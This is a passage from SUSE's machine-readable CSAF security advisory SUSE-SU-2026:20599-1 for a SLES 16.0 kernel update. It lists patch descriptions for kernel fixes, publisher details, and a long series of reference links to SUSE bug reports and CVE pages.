bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).\n- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).\n- btrfs: pass fs_info to btrfs_delete_ref_head() (git-fixes).\n- btrfs: scrub: always update btrfs_scrub_progress::last_physical (git-fixes).\n- bus: fsl-mc: Constify fsl_mc_device_match() (jsc#PED-10906 git-fixes).\n- drm/imagination: Wait for FW trace update command completion (git-fixes).\n- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).\n- ice: use netif_get_num_default_rss_queues() (bsc#1247712).\n- libbpf: Fix -Wdiscarded-qualifiers under C23 (bsc#1257309).\n- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).\n- net: mana: Fix incorrect speed reported by debugfs (bsc#1255232).\n- net: mana: Support HW link state events (bsc#1253049).\n- nfsd: adjust WARN_ON_ONCE in revoke_delegation (bsc#1257015).\n- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).\n- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).\n- sched/fair: Disable scheduler feature NEXT_BUDDY (bsc#1255459).\n- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256864).\n- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256864).\n- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).\n- slimbus: core: Constify slim_eaddr_equal() (jsc#PED-10906 git-fixes).\n- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).\n- smb: client: update cfid-\u003elast_access_time in open_cached_dir_by_dentry() (git-fixes).\n- smb: improve directory cache reuse for readdir operations (bsc#1252712).\n- tsm-mr: Add TVM Measurement Register support (bsc#1257504).\n- tsm-mr: Add tsm-mr sample code (bsc#1257504).\n- virt: tdx-guest: Expose TDX MRs as sysfs attributes (bsc#1257504).\n- virt: tdx-guest: Refactor and streamline TDREPORT generation (bsc#1257504).\n- virt: tdx-guest: Transition to scoped_cond_guard for mutex operations (bsc#1257504).\n- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).\n- x86/tdx: Add tdx_mcall_extend_rtmr() interface (bsc#1257504).\n- x86/tdx: tdx_mcall_get_report0: Return -EBUSY on TDCALL_OPERAND_BUSY error (bsc#1257504).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLES-16.0-325",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20599-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20599-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620599-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20599-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024614.html"
},
{
"category": "self",
"summary": "SUSE Bug 1205462",
"url": "https://bugzilla.suse.com/1205462"
},
{
"category": "self",
"summary": "SUSE Bug 1214285",
"url": "https://bugzilla.suse.com/1214285"
},
{
"category": "self",
"summary": "SUSE Bug 1215199",
"url": "https://bugzilla.suse.com/1215199"
},
{
"category": "self",
"summary": "SUSE Bug 1235905",
"url": "https://bugzilla.suse.com/1235905"
},
{
"category": "self",
"summary": "SUSE Bug 1242505",
"url": "https://bugzilla.suse.com/1242505"
},
{
"category": "self",
"summary": "SUSE Bug 1242974",
"url": "https://bugzilla.suse.com/1242974"
},
{
"category": "self",
"summary": "SUSE Bug 1242986",
"url": "https://bugzilla.suse.com/1242986"
},
{
"category": "self",
"summary": "SUSE Bug 1243452",
"url": "https://bugzilla.suse.com/1243452"
},
{
"category": "self",
"summary": "SUSE Bug 1243507",
"url": "https://bugzilla.suse.com/1243507"
},
{
"category": "self",
"summary": "SUSE Bug 1243662",
"url": "https://bugzilla.suse.com/1243662"
},
{
"category": "self",
"summary": "SUSE Bug 1246184",
"url": "https://bugzilla.suse.com/1246184"
},
{
"category": "self",
"summary": "SUSE Bug 1246282",
"url": "https://bugzilla.suse.com/1246282"
},
{
"category": "self",
"summary": "SUSE Bug 1247030",
"url": "https://bugzilla.suse.com/1247030"
},
{
"category": "self",
"summary": "SUSE Bug 1247292",
"url": "https://bugzilla.suse.com/1247292"
},
{
"category": "self",
"summary": "SUSE Bug 1247712",
"url": "https://bugzilla.suse.com/1247712"
},
{
"category": "self",
"summary": "SUSE Bug 1248166",
"url": "https://bugzilla.suse.com/1248166"
},
{
"category": "self",
"summary": "SUSE Bug 1248175",
"url": "https://bugzilla.suse.com/1248175"
},
{
"category": "self",
"summary": "SUSE Bug 1248178",
"url": "https://bugzilla.suse.com/1248178"
},
{
"category": "self",
"summary": "SUSE Bug 1248179",
"url": "https://bugzilla.suse.com/1248179"
},
{
"category": "self",
"summary": "SUSE Bug 1248185",
"url": "https://bugzilla.suse.com/1248185"
},
{
"category": "self",
"summary": "SUSE Bug 1248188",
"url": "https://bugzilla.suse.com/1248188"
},
{
"category": "self",
"summary": "SUSE Bug 1248196",
"url": "https://bugzilla.suse.com/1248196"
},
{
"category": "self",
"summary": "SUSE Bug 1248206",
"url": "https://bugzilla.suse.com/1248206"
},
{
"category": "self",
"summary": "SUSE Bug 1248208",
"url": "https://bugzilla.suse.com/1248208"
},
{
"category": "self",
"summary": "SUSE Bug 1248209",
"url": "https://bugzilla.suse.com/1248209"
},
{
"category": "self",
"summary": "SUSE Bug 1248211",
"url": "https://bugzilla.suse.com/1248211"
},
{
"category": "self",
"summary": "SUSE Bug 1248212",
"url": "https://bugzilla.suse.com/1248212"
},
{
"category": "self",
"summary": "SUSE Bug 1248213",
"url": "https://bugzilla.suse.com/1248213"
},
{
"category": "self",
"summary": "SUSE Bug 1248214",
"url": "https://bugzilla.suse.com/1248214"
},
{
"category": "self",
"summary": "SUSE Bug 1248216",
"url": "https://bugzilla.suse.com/1248216"
},
{
"category": "self",
"summary": "SUSE Bug 1248217",
"url": "https://bugzilla.suse.com/1248217"
},
{
"category": "self",
"summary": "SUSE Bug 1248222",
"url": "https://bugzilla.suse.com/1248222"
},
{
"category": "self",
"summary": "SUSE Bug 1248227",
"url": "https://bugzilla.suse.com/1248227"
},
{
"category": "self",
"summary": "SUSE Bug 1248228",
"url": "https://bugzilla.suse.com/1248228"
},
{
"category": "self",
"summary": "SUSE Bug 1248229",
"url": "https://bugzilla.suse.com/1248229"
},
{
"category": "self",
"summary": "SUSE Bug 1248232",
"url": "https://bugzilla.suse.com/1248232"
},
{
"category": "self",
"summary": "SUSE Bug 1248234",
"url": "https://bugzilla.suse.com/1248234"
},
{
"category": "self",
"summary": "SUSE Bug 1248240",
"url": "https://bugzilla.suse.com/1248240"
},
{
"category": "self",
"summary": "SUSE Bug 1248360",
"url": "https://bugzilla.suse.com/1248360"
},
{
"category": "self",
"summary": "SUSE Bug 1248366",
"url": "https://bugzilla.suse.com/1248366"
},
{
"category": "self",
"summary": "SUSE Bug 1248384",
"url": "https://bugzilla.suse.com/1248384"
},
{
"category": "self",
"summary": "SUSE Bug 1248626",
"url": "https://bugzilla.suse.com/1248626"
},
{
"category": "self",
"summary": "SUSE Bug 1249307",
"url": "https://bugzilla.suse.com/1249307"
},
{
"category": "self",
"summary": "SUSE Bug 1249609",
"url": "https://bugzilla.suse.com/1249609"
},
{
"category": "self",
"summary": "SUSE Bug 1249895",
"url": "https://bugzilla.suse.com/1249895"
},
{
"category": "self",
"summary": "SUSE Bug 1249998",
"url": "https://bugzilla.suse.com/1249998"
},
{
"category": "self",
"summary": "SUSE Bug 1250032",
"url": "https://bugzilla.suse.com/1250032"
},
{
"category": "self",
"summary": "SUSE Bug 1250082",
"url": "https://bugzilla.suse.com/1250082"
},
{
"category": "self",
"summary": "SUSE Bug 1250388",
"url": "https://bugzilla.suse.com/1250388"
},
{
"category": "self",
"summary": "SUSE Bug 1250705",
"url": "https://bugzilla.suse.com/1250705"
},
{
"category": "self",
"summary": "SUSE Bug 1250738",
"url": "https://bugzilla.suse.com/1250738"
},
{
"category": "self",
"summary": "SUSE Bug 1250748",
"url": "https://bugzilla.suse.com/1250748"
},
{
"category": "self",
"summary": "SUSE Bug 1252712",
"url": "https://bugzilla.suse.com/1252712"
},
{
"category": "self",
"summary": "SUSE Bug 1252773",
"url": "https://bugzilla.suse.com/1252773"
},
{
"category": "self",
"summary": "SUSE Bug 1252784",
"url": "https://bugzilla.suse.com/1252784"
},
{
"category": "self",
"summary": "SUSE Bug 1252891",
"url": "https://bugzilla.suse.com/1252891"
},
{
"category": "self",
"summary": "SUSE Bug 1252900",
"url": "https://bugzilla.suse.com/1252900"
},
{
"category": "self",
"summary": "SUSE Bug 1253049",
"url": "https://bugzilla.suse.com/1253049"
},
{
"category": "self",
"summary": "SUSE Bug 1253078",
"url": "https://bugzilla.suse.com/1253078"
},
{
"category": "self",
"summary": "SUSE Bug 1253079",
"url": "https://bugzilla.suse.com/1253079"
},
{
"category": "self",
"summary": "SUSE Bug 1253087",
"url": "https://bugzilla.suse.com/1253087"
},
{
"category": "self",
"summary": "SUSE Bug 1253344",
"url": "https://bugzilla.suse.com/1253344"
},
{
"category": "self",
"summary": "SUSE Bug 1253500",
"url": "https://bugzilla.suse.com/1253500"
},
{
"category": "self",
"summary": "SUSE Bug 1253739",
"url": "https://bugzilla.suse.com/1253739"
},
{
"category": "self",
"summary": "SUSE Bug 1254244",
"url": "https://bugzilla.suse.com/1254244"
},
{
"category": "self",
"summary": "SUSE Bug 1254308",
"url": "https://bugzilla.suse.com/1254308"
},
{
"category": "self",
"summary": "SUSE Bug 1254447",
"url": "https://bugzilla.suse.com/1254447"
},
{
"category": "self",
"summary": "SUSE Bug 1254839",
"url": "https://bugzilla.suse.com/1254839"
},
{
"category": "self",
"summary": "SUSE Bug 1254842",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "self",
"summary": "SUSE Bug 1254845",
"url": "https://bugzilla.suse.com/1254845"
},
{
"category": "self",
"summary": "SUSE Bug 1254977",
"url": "https://bugzilla.suse.com/1254977"
},
{
"category": "self",
"summary": "SUSE Bug 1255102",
"url": "https://bugzilla.suse.com/1255102"
},
{
"category": "self",
"summary": "SUSE Bug 1255128",
"url": "https://bugzilla.suse.com/1255128"
},
{
"category": "self",
"summary": "SUSE Bug 1255157",
"url": "https://bugzilla.suse.com/1255157"
},
{
"category": "self",
"summary": "SUSE Bug 1255164",
"url": "https://bugzilla.suse.com/1255164"
},
{
"category": "self",
"summary": "SUSE Bug 1255172",
"url": "https://bugzilla.suse.com/1255172"
},
{
"category": "self",
"summary": "SUSE Bug 1255216",
"url": "https://bugzilla.suse.com/1255216"
},
{
"category": "self",
"summary": "SUSE Bug 1255232",
"url": "https://bugzilla.suse.com/1255232"
},
{
"category": "self",
"summary": "SUSE Bug 1255241",
"url": "https://bugzilla.suse.com/1255241"
},
{
"category": "self",
"summary": "SUSE Bug 1255245",
"url": "https://bugzilla.suse.com/1255245"
},
{
"category": "self",
"summary": "SUSE Bug 1255266",
"url": "https://bugzilla.suse.com/1255266"
},
{
"category": "self",
"summary": "SUSE Bug 1255268",
"url": "https://bugzilla.suse.com/1255268"
},
{
"category": "self",
"summary": "SUSE Bug 1255269",
"url": "https://bugzilla.suse.com/1255269"
},
{
"category": "self",
"summary": "SUSE Bug 1255319",
"url": "https://bugzilla.suse.com/1255319"
},
{
"category": "self",
"summary": "SUSE Bug 1255327",
"url": "https://bugzilla.suse.com/1255327"
},
{
"category": "self",
"summary": "SUSE Bug 1255346",
"url": "https://bugzilla.suse.com/1255346"
},
{
"category": "self",
"summary": "SUSE Bug 1255403",
"url": "https://bugzilla.suse.com/1255403"
},
{
"category": "self",
"summary": "SUSE Bug 1255417",
"url": "https://bugzilla.suse.com/1255417"
},
{
"category": "self",
"summary": "SUSE Bug 1255459",
"url": "https://bugzilla.suse.com/1255459"
},
{
"category": "self",
"summary": "SUSE Bug 1255482",
"url": "https://bugzilla.suse.com/1255482"
},
{
"category": "self",
"summary": "SUSE Bug 1255506",
"url": "https://bugzilla.suse.com/1255506"
},
{
"category": "self",
"summary": "SUSE Bug 1255526",
"url": "https://bugzilla.suse.com/1255526"
},
{
"category": "self",
"summary": "SUSE Bug 1255527",
"url": "https://bugzilla.suse.com/1255527"
},
{
"category": "self",
"summary": "SUSE Bug 1255529",
"url": "https://bugzilla.suse.com/1255529"
},
{
"category": "self",
"summary": "SUSE Bug 1255530",
"url": "https://bugzilla.suse.com/1255530"
},
{
"category": "self",
"summary": "SUSE Bug 1255536",
"url": "https://bugzilla.suse.com/1255536"
},
{
"category": "self",
"summary": "SUSE Bug 1255537",
"url": "https://bugzilla.suse.com/1255537"
},
{
"category": "self",
"summary": "SUSE Bug 1255542",
"url": "https://bugzilla.suse.com/1255542"
},
{
"category": "self",
"summary": "SUSE Bug 1255544",
"url": "https://bugzilla.suse.com/1255544"
},
{
"category": "self",
"summary": "SUSE Bug 1255547",
"url": "https://bugzilla.suse.com/1255547"
},
{
"category": "self",
"summary": "SUSE Bug 1255569",
"url": "https://bugzilla.suse.com/1255569"
},
{
"category": "self",
"summary": "SUSE Bug 1255593",
"url": "https://bugzilla.suse.com/1255593"
},
{
"category": "self",
"summary": "SUSE Bug 1255622",
"url": "https://bugzilla.suse.com/1255622"
},
{
"category": "self",
"summary": "SUSE Bug 1255694",
"url": "https://bugzilla.suse.com/1255694"
},
{
"category": "self",
"summary": "SUSE Bug 1255695",
"url": "https://bugzilla.suse.com/1255695"
},
{
"category": "self",
"summary": "SUSE Bug 1255703",
"url": "https://bugzilla.suse.com/1255703"
},
{
"category": "self",
"summary": "SUSE Bug 1255708",
"url": "https://bugzilla.suse.com/1255708"
},
{
"category": "self",
"summary": "SUSE Bug 1255811",
"url": "https://bugzilla.suse.com/1255811"
},
{
"category": "self",
"summary": "SUSE Bug 1255930",
"url": "https://bugzilla.suse.com/1255930"
},
{
"category": "self",
"summary": "SUSE Bug 1256579",
"url": "https://bugzilla.suse.com/1256579"
},
{
"category": "self",
"summary": "SUSE Bug 1256582",
"url": "https://bugzilla.suse.com/1256582"
},
{
"category": "self",
"summary": "SUSE Bug 1256584",
"url": "https://bugzilla.suse.com/1256584"
},
{
"category": "self",
"summary": "SUSE Bug 1256586",
"url": "https://bugzilla.suse.com/1256586"
},
{
"category": "self",
"summary": "SUSE Bug 1256591",
"url": "https://bugzilla.suse.com/1256591"
},
{
"category": "self",
"summary": "SUSE Bug 1256592",
"url": "https://bugzilla.suse.com/1256592"
},
{
"category": "self",
"summary": "SUSE Bug 1256593",
"url": "https://bugzilla.suse.com/1256593"
},
{
"category": "self",
"summary": "SUSE Bug 1256594",
"url": "https://bugzilla.suse.com/1256594"
},
{
"category": "self",
"summary": "SUSE Bug 1256597",
"url": "https://bugzilla.suse.com/1256597"
},
{
"category": "self",
"summary": "SUSE Bug 1256605",
"url": "https://bugzilla.suse.com/1256605"
},
{
"category": "self",
"summary": "SUSE Bug 1256607",
"url": "https://bugzilla.suse.com/1256607"
},
{
"category": "self",
"summary": "SUSE Bug 1256608",
"url": "https://bugzilla.suse.com/1256608"
},
{
"category": "self",
"summary": "SUSE Bug 1256609",
"url": "https://bugzilla.suse.com/1256609"
},
{
"category": "self",
"summary": "SUSE Bug 1256610",
"url": "https://bugzilla.suse.com/1256610"
},
{
"category": "self",
"summary": "SUSE Bug 1256611",
"url": "https://bugzilla.suse.com/1256611"
},
{
"category": "self",
"summary": "SUSE Bug 1256612",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "self",
"summary": "SUSE Bug 1256613",
"url": "https://bugzilla.suse.com/1256613"
},
{
"category": "self",
"summary": "SUSE Bug 1256616",
"url": "https://bugzilla.suse.com/1256616"
},
{
"category": "self",
"summary": "SUSE Bug 1256617",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "self",
"summary": "SUSE Bug 1256619",
"url": "https://bugzilla.suse.com/1256619"
},
{
"category": "self",
"summary": "SUSE Bug 1256622",
"url": "https://bugzilla.suse.com/1256622"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256625",
"url": "https://bugzilla.suse.com/1256625"
},
{
"category": "self",
"summary": "SUSE Bug 1256627",
"url": "https://bugzilla.suse.com/1256627"
},
{
"category": "self",
"summary": "SUSE Bug 1256628",
"url": "https://bugzilla.suse.com/1256628"
},
{
"category": "self",
"summary": "SUSE Bug 1256630",
"url": "https://bugzilla.suse.com/1256630"
},
{
"category": "self",
"summary": "SUSE Bug 1256632",
"url": "https://bugzilla.suse.com/1256632"
},
{
"category": "self",
"summary": "SUSE Bug 1256638",
"url": "https://bugzilla.suse.com/1256638"
},
{
"category": "self",
"summary": "SUSE Bug 1256641",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "self",
"summary": "SUSE Bug 1256643",
"url": "https://bugzilla.suse.com/1256643"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256646",
"url": "https://bugzilla.suse.com/1256646"
},
{
"category": "self",
"summary": "SUSE Bug 1256650",
"url": "https://bugzilla.suse.com/1256650"
},
{
"category": "self",
"summary": "SUSE Bug 1256651",
"url": "https://bugzilla.suse.com/1256651"
},
{
"category": "self",
"summary": "SUSE Bug 1256653",
"url": "https://bugzilla.suse.com/1256653"
},
{
"category": "self",
"summary": "SUSE Bug 1256654",
"url": "https://bugzilla.suse.com/1256654"
},
{
"category": "self",
"summary": "SUSE Bug 1256655",
"url": "https://bugzilla.suse.com/1256655"
},
{
"category": "self",
"summary": "SUSE Bug 1256656",
"url": "https://bugzilla.suse.com/1256656"
},
{
"category": "self",
"summary": "SUSE Bug 1256659",
"url": "https://bugzilla.suse.com/1256659"
},
{
"category": "self",
"summary": "SUSE Bug 1256660",
"url": "https://bugzilla.suse.com/1256660"
},
{
"category": "self",
"summary": "SUSE Bug 1256661",
"url": "https://bugzilla.suse.com/1256661"
},
{
"category": "self",
"summary": "SUSE Bug 1256664",
"url": "https://bugzilla.suse.com/1256664"
},
{
"category": "self",
"summary": "SUSE Bug 1256665",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "self",
"summary": "SUSE Bug 1256667",
"url": "https://bugzilla.suse.com/1256667"
},
{
"category": "self",
"summary": "SUSE Bug 1256668",
"url": "https://bugzilla.suse.com/1256668"
},
{
"category": "self",
"summary": "SUSE Bug 1256674",
"url": "https://bugzilla.suse.com/1256674"
},
{
"category": "self",
"summary": "SUSE Bug 1256677",
"url": "https://bugzilla.suse.com/1256677"
},
{
"category": "self",
"summary": "SUSE Bug 1256680",
"url": "https://bugzilla.suse.com/1256680"
},
{
"category": "self",
"summary": "SUSE Bug 1256682",
"url": "https://bugzilla.suse.com/1256682"
},
{
"category": "self",
"summary": "SUSE Bug 1256683",
"url": "https://bugzilla.suse.com/1256683"
},
{
"category": "self",
"summary": "SUSE Bug 1256688",
"url": "https://bugzilla.suse.com/1256688"
},
{
"category": "self",
"summary": "SUSE Bug 1256689",
"url": "https://bugzilla.suse.com/1256689"
},
{
"category": "self",
"summary": "SUSE Bug 1256716",
"url": "https://bugzilla.suse.com/1256716"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256728",
"url": "https://bugzilla.suse.com/1256728"
},
{
"category": "self",
"summary": "SUSE Bug 1256730",
"url": "https://bugzilla.suse.com/1256730"
},
{
"category": "self",
"summary": "SUSE Bug 1256733",
"url": "https://bugzilla.suse.com/1256733"
},
{
"category": "self",
"summary": "SUSE Bug 1256737",
"url": "https://bugzilla.suse.com/1256737"
},
{
"category": "self",
"summary": "SUSE Bug 1256741",
"url": "https://bugzilla.suse.com/1256741"
},
{
"category": "self",
"summary": "SUSE Bug 1256742",
"url": "https://bugzilla.suse.com/1256742"
},
{
"category": "self",
"summary": "SUSE Bug 1256744",
"url": "https://bugzilla.suse.com/1256744"
},
{
"category": "self",
"summary": "SUSE Bug 1256748",
"url": "https://bugzilla.suse.com/1256748"
},
{
"category": "self",
"summary": "SUSE Bug 1256749",
"url": "https://bugzilla.suse.com/1256749"
},
{
"category": "self",
"summary": "SUSE Bug 1256752",
"url": "https://bugzilla.suse.com/1256752"
},
{
"category": "self",
"summary": "SUSE Bug 1256754",
"url": "https://bugzilla.suse.com/1256754"
},
{
"category": "self",
"summary": "SUSE Bug 1256755",
"url": "https://bugzilla.suse.com/1256755"
},
{
"category": "self",
"summary": "SUSE Bug 1256756",
"url": "https://bugzilla.suse.com/1256756"
},
{
"category": "self",
"summary": "SUSE Bug 1256757",
"url": "https://bugzilla.suse.com/1256757"
},
{
"category": "self",
"summary": "SUSE Bug 1256759",
"url": "https://bugzilla.suse.com/1256759"
},
{
"category": "self",
"summary": "SUSE Bug 1256760",
"url": "https://bugzilla.suse.com/1256760"
},
{
"category": "self",
"summary": "SUSE Bug 1256761",
"url": "https://bugzilla.suse.com/1256761"
},
{
"category": "self",
"summary": "SUSE Bug 1256763",
"url": "https://bugzilla.suse.com/1256763"
},
{
"category": "self",
"summary": "SUSE Bug 1256770",
"url": "https://bugzilla.suse.com/1256770"
},
{
"category": "self",
"summary": "SUSE Bug 1256773",
"url": "https://bugzilla.suse.com/1256773"
},
{
"category": "self",
"summary": "SUSE Bug 1256774",
"url": "https://bugzilla.suse.com/1256774"
},
{
"category": "self",
"summary": "SUSE Bug 1256777",
"url": "https://bugzilla.suse.com/1256777"
},
{
"category": "self",
"summary": "SUSE Bug 1256779",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "self",
"summary": "SUSE Bug 1256781",
"url": "https://bugzilla.suse.com/1256781"
},
{
"category": "self",
"summary": "SUSE Bug 1256785",
"url": "https://bugzilla.suse.com/1256785"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1256793",
"url": "https://bugzilla.suse.com/1256793"
},
{
"category": "self",
"summary": "SUSE Bug 1256794",
"url": "https://bugzilla.suse.com/1256794"
},
{
"category": "self",
"summary": "SUSE Bug 1256864",
"url": "https://bugzilla.suse.com/1256864"
},
{
"category": "self",
"summary": "SUSE Bug 1256865",
"url": "https://bugzilla.suse.com/1256865"
},
{
"category": "self",
"summary": "SUSE Bug 1256867",
"url": "https://bugzilla.suse.com/1256867"
},
{
"category": "self",
"summary": "SUSE Bug 1256975",
"url": "https://bugzilla.suse.com/1256975"
},
{
"category": "self",
"summary": "SUSE Bug 1257015",
"url": "https://bugzilla.suse.com/1257015"
},
{
"category": "self",
"summary": "SUSE Bug 1257035",
"url": "https://bugzilla.suse.com/1257035"
},
{
"category": "self",
"summary": "SUSE Bug 1257053",
"url": "https://bugzilla.suse.com/1257053"
},
{
"category": "self",
"summary": "SUSE Bug 1257154",
"url": "https://bugzilla.suse.com/1257154"
},
{
"category": "self",
"summary": "SUSE Bug 1257155",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "self",
"summary": "SUSE Bug 1257158",
"url": "https://bugzilla.suse.com/1257158"
},
{
"category": "self",
"summary": "SUSE Bug 1257159",
"url": "https://bugzilla.suse.com/1257159"
},
{
"category": "self",
"summary": "SUSE Bug 1257163",
"url": "https://bugzilla.suse.com/1257163"
},
{
"category": "self",
"summary": "SUSE Bug 1257164",
"url": "https://bugzilla.suse.com/1257164"
},
{
"category": "self",
"summary": "SUSE Bug 1257167",
"url": "https://bugzilla.suse.com/1257167"
},
{
"category": "self",
"summary": "SUSE Bug 1257168",
"url": "https://bugzilla.suse.com/1257168"
},
{
"category": "self",
"summary": "SUSE Bug 1257179",
"url": "https://bugzilla.suse.com/1257179"
},
{
"category": "self",
"summary": "SUSE Bug 1257180",
"url": "https://bugzilla.suse.com/1257180"
},
{
"category": "self",
"summary": "SUSE Bug 1257202",
"url": "https://bugzilla.suse.com/1257202"
},
{
"category": "self",
"summary": "SUSE Bug 1257204",
"url": "https://bugzilla.suse.com/1257204"
},
{
"category": "self",
"summary": "SUSE Bug 1257207",
"url": "https://bugzilla.suse.com/1257207"
},
{
"category": "self",
"summary": "SUSE Bug 1257208",
"url": "https://bugzilla.suse.com/1257208"
},
{
"category": "self",
"summary": "SUSE Bug 1257215",
"url": "https://bugzilla.suse.com/1257215"
},
{
"category": "self",
"summary": "SUSE Bug 1257217",
"url": "https://bugzilla.suse.com/1257217"
},
{
"category": "self",
"summary": "SUSE Bug 1257218",
"url": "https://bugzilla.suse.com/1257218"
},
{
"category": "self",
"summary": "SUSE Bug 1257220",
"url": "https://bugzilla.suse.com/1257220"
},
{
"category": "self",
"summary": "SUSE Bug 1257221",
"url": "https://bugzilla.suse.com/1257221"
},
{
"category": "self",
"summary": "SUSE Bug 1257225",
"url": "https://bugzilla.suse.com/1257225"
},
{
"category": "self",
"summary": "SUSE Bug 1257227",
"url": "https://bugzilla.suse.com/1257227"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257234",
"url": "https://bugzilla.suse.com/1257234"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257243",
"url": "https://bugzilla.suse.com/1257243"
},
{
"category": "self",
"summary": "SUSE Bug 1257245",
"url": "https://bugzilla.suse.com/1257245"
},
{
"category": "self",
"summary": "SUSE Bug 1257276",
"url": "https://bugzilla.suse.com/1257276"
},
{
"category": "self",
"summary": "SUSE Bug 1257277",
"url": "https://bugzilla.suse.com/1257277"
},
{
"category": "self",
"summary": "SUSE Bug 1257279",
"url": "https://bugzilla.suse.com/1257279"
},
{
"category": "self",
"summary": "SUSE Bug 1257282",
"url": "https://bugzilla.suse.com/1257282"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257309",
"url": "https://bugzilla.suse.com/1257309"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257504",
"url": "https://bugzilla.suse.com/1257504"
},
{
"category": "self",
"summary": "SUSE Bug 1257603",
"url": "https://bugzilla.suse.com/1257603"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-54031 page",
"url": "https://www.suse.com/security/cve/CVE-2024-54031/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37744 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37751 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37751/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37841 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37841/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37845 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37845/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37904 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37904/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37955 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37955/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38262 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38262/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38298 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38298/"
},
{
